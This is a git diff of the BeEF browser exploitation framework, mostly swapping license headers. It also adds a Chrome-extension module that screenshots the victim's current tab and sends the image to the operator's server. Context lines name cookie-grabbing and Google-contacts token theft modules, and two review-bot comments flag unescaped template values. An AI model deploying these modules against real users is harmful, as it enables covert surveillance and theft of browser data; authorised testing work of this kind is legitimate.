-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb
index de2df6639..0130d5b34 100644
--- a/modules/browser/webcam/module.rb
+++ b/modules/browser/webcam/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 require 'base64'
 class Webcam < BeEF::Core::Command
diff --git a/modules/chrome_extensions/execute_tabs/command.js b/modules/chrome_extensions/execute_tabs/command.js
index 1b9ceb907..10219874c 100644
--- a/modules/chrome_extensions/execute_tabs/command.js
+++ b/modules/chrome_extensions/execute_tabs/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { try{ chrome.tabs.create({url:"<%= @url %>"}, function(tab){
diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml
index ae9c3031e..f3c05c603 100644
--- a/modules/chrome_extensions/execute_tabs/config.yaml
+++ b/modules/chrome_extensions/execute_tabs/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb
index cf476cc61..8e1e31cd1 100644
--- a/modules/chrome_extensions/execute_tabs/module.rb
+++ b/modules/chrome_extensions/execute_tabs/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Execute_tabs < BeEF::Core::Command
diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js
index 4a531214b..d43ec533a 100755
--- a/modules/chrome_extensions/get_all_cookies/command.js
+++ b/modules/chrome_extensions/get_all_cookies/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { the_url = "<%== @url %>"; if (the_url != 'default_all') {
diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml
index 04cc73ebd..0b5d3cf7b 100755
--- a/modules/chrome_extensions/get_all_cookies/config.yaml
+++ b/modules/chrome_extensions/get_all_cookies/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb
index 362e62d4f..37cac3263 100755
--- a/modules/chrome_extensions/get_all_cookies/module.rb
+++ b/modules/chrome_extensions/get_all_cookies/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_all_cookies < BeEF::Core::Command
diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/chrome_extensions/get_chrome_extensions/command.js
index 49a38a176..d7f16b3ba 100644
--- a/modules/chrome_extensions/get_chrome_extensions/command.js
+++ b/modules/chrome_extensions/get_chrome_extensions/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { extensions = new Array(
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml
index 69718be2e..550a48a4a 100644
--- a/modules/chrome_extensions/get_chrome_extensions/config.yaml
+++ b/modules/chrome_extensions/get_chrome_extensions/config.yaml
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/chrome_extensions/get_chrome_extensions/module.rb index fa42f2e97..c3c027081 100644 --- a/modules/chrome_extensions/get_chrome_extensions/module.rb +++ b/modules/chrome_extensions/get_chrome_extensions/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # More info: # http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html 
diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js index 0f75afdeb..e19bfe46f 100644 --- a/modules/chrome_extensions/grab_google_contacts/command.js +++ b/modules/chrome_extensions/grab_google_contacts/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var regContacts = '("AuthToken":{"Value":")(.*)("}}};)'; function grabCSV(token){ diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml index 2046f12b6..2ee430c3c 100644 --- a/modules/chrome_extensions/grab_google_contacts/config.yaml +++ b/modules/chrome_extensions/grab_google_contacts/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb index 01b9f8c0a..a4f2b9022 100644 --- a/modules/chrome_extensions/grab_google_contacts/module.rb +++ b/modules/chrome_extensions/grab_google_contacts/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Grab_google_contacts < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 0e1a6ec14..ec878845a 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml index 6df5193fb..92416d2dd 100755 --- a/modules/chrome_extensions/inject_beef/config.yaml +++ b/modules/chrome_extensions/inject_beef/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb index ebb133088..346daea70 100755 --- a/modules/chrome_extensions/inject_beef/module.rb +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inject_beef < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js new file mode 100755 index 000000000..bc5df119a --- /dev/null +++ b/modules/chrome_extensions/screenshot/command.js @@ -0,0 +1,13 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + chrome.tabs.captureVisibleTab(null, function(img) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'img: ' + img.toString()); + }); +}); + diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml new file mode 100755 index 000000000..3b293bd55 --- /dev/null +++ b/modules/chrome_extensions/screenshot/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + screenshot: + enable: true + category: "Chrome Extensions" + name: "Screenshot" + description: "Screenshots current tab the user is in, screenshot returned as base64d data for a dataurl" + authors: ["mh"] + target: + working: ["C"] + not_working: ["All"] diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb new file mode 100755 index 000000000..714290a43 --- /dev/null +++ b/modules/chrome_extensions/screenshot/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Screenshot < BeEF::Core::Command + + def post_execute + content = {} + content['Return'] = @datastore['return'] + save content + end + +end 
diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js index 279b56c76..a2024ee12 100755 --- a/modules/chrome_extensions/send_gvoice_sms/command.js +++ b/modules/chrome_extensions/send_gvoice_sms/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var to = "<%= @to %>"; var message = "<%= @message %>"; diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml index e8e99a730..4253c482d 100755 --- a/modules/chrome_extensions/send_gvoice_sms/config.yaml +++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb index a692f861c..85950bc03 100755 --- a/modules/chrome_extensions/send_gvoice_sms/module.rb +++ b/modules/chrome_extensions/send_gvoice_sms/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Send_gvoice_sms < BeEF::Core::Command 
diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js new file mode 100644 index 000000000..bfe5abc2d --- /dev/null +++ b/modules/debug/test_cors_request/command.js @@ -0,0 +1,16 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var method = "<%= @method %>"; + var url = "<%= @url %>"; + var data = "<%= @data %>"; + + beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); }); + +}); + diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml new file mode 100644 index 000000000..767060493 --- /dev/null +++ b/modules/debug/test_cors_request/config.yaml @@ -0,0 +1,28 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_cors_request: + enable: true + category: "Debug" + name: "Test CORS Request" + description: "Test the beef.net.cors.request function by retrieving a URL." + authors: ["bcoles"] + target: + working: ["ALL"] + not_working: + IE: + min_ver: 6 + max_ver: 7 + O: + min_ver: 1 + max_ver: 11 + C: + min_ver: 1 + max_ver: 2 + S: + min_ver: 1 + max_ver: 3 diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb new file mode 100644 index 000000000..98bb97973 --- /dev/null +++ b/modules/debug/test_cors_request/module.rb 
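Review bot: In test_cors_request/command.js the assignments `var method = "<%= @method %>";`, `var url = "<%= @url %>";` and `var data = "<%= @data %>";` paste operator-supplied option values straight into double-quoted JavaScript literals, so a value containing `"`, a backslash or a newline yields a broken or altered script. Nothing in this hunk shows the values being encoded beforehand. If the template layer does not do it, emit them as JSON literals instead, e.g. `var url = <%= @url.to_json %>;` (assuming the JSON library is loaded where the template is rendered). The same pattern, with single-quoted literals, appears in the axous_1_1_1_add_user_csrf and beef_bind_shell command.js files added later in this commit.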
@@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_cors_request < BeEF::Core::Command + + def post_execute + content = {} + content['response'] = @datastore['response'] + save content + end + + def self.options + + return [ + {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, + {'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' }, + {'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }, + ] + end + +end diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js index 1e298d835..97bca59b8 100644 --- a/modules/debug/test_network_request/command.js +++ b/modules/debug/test_network_request/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var scheme = "<%= @scheme %>"; 
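Review bot: The default for the `url` option in `self.options` is a live third-party endpoint (`http://graph.facebook.com/fql?...`) over plain HTTP, so running this debug module with its defaults sends a request from the browser under test to a host outside the test setup. A self-test is easier to reason about when the default is a placeholder the operator must replace with a host they control, for example `'value' => 'http://<your-test-host>/'`. Whether the `data` default `'postdata'` is ignored while the method stays `GET` is not visible in this commit; a one-line comment on that option would settle it.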
diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml index f753bf17c..b8ba5904d 100644 --- a/modules/debug/test_network_request/config.yaml +++ b/modules/debug/test_network_request/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index e4de490dd..bddfb3459 100644 --- a/modules/debug/test_network_request/module.rb +++ b/modules/debug/test_network_request/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_network_request < BeEF::Core::Command diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js index e19a1ea91..afdcea3d8 100644 --- a/modules/debug/test_return_ascii_chars/command.js +++ b/modules/debug/test_return_ascii_chars/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var str = ''; 
diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml index 64eff01e8..7d8c2f4f7 100644 --- a/modules/debug/test_return_ascii_chars/config.yaml +++ b/modules/debug/test_return_ascii_chars/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb index 1f4b40690..ae81dbfba 100644 --- a/modules/debug/test_return_ascii_chars/module.rb +++ b/modules/debug/test_return_ascii_chars/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_ascii_chars < BeEF::Core::Command diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js index da26b067d..656a48fd7 100644 --- a/modules/debug/test_return_long_string/command.js +++ b/modules/debug/test_return_long_string/command.js 
